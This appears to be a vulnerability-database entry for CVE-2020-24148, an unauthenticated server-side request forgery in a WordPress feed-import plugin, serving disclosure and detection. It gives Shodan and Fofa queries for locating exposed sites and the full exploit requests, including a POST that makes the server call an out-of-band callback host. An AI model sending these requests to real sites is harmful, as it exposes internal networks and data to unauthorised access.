🔙 목록으로 돌아가기

CVE-2020-24148: Import XML & RSS Feeds WordPress Plugin <= 2.0.1 Server-Side Request Forgery

TitleImport XML & RSS Feeds WordPress Plugin <= 2.0.1 Server-Side Request Forgery
Authordwisiswant0
SeverityCritical
ImpactUnauthenticated attackers can perform server-side request forgery to access internal resources, scan internal networks, or retrieve sensitive data from internal systems.
RemediationUpdate to the latest version of the Import XML & RSS Feeds WordPress Plugin (2.0.2 or higher) to mitigate the vulnerability.
CVSS Score9.1
EPSS Score0.92759
CVE IDCVE-2020-24148
CWE IDCWE-918
Shodan Queryhttp.html:"import-xml-feed"
Fofa Querybody="import-xml-feed"
Tags cve cve2020 wordpress wp-plugin ssrf mooveagency vuln

🔍 Vulnerability Description

WordPress plugin Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 contains a server-side request forgery (SSRF) vulnerability via the data parameter in a moove_read_xml action.

🌐 HTTP Request

GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/ Firefox/3.6.6
Connection: close
Accept-Encoding: gzip
POST /wp-admin/admin-ajax.php?action=moove_read_xml HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Connection: close
Content-Length: 97
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

type=url&data=http%3A%2F%2Fd5jonv1le0o46o05ini0gude4tuy8kt7s.oast.pro%2F&xmlaction=preview&node=0

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-24148.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-24148.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A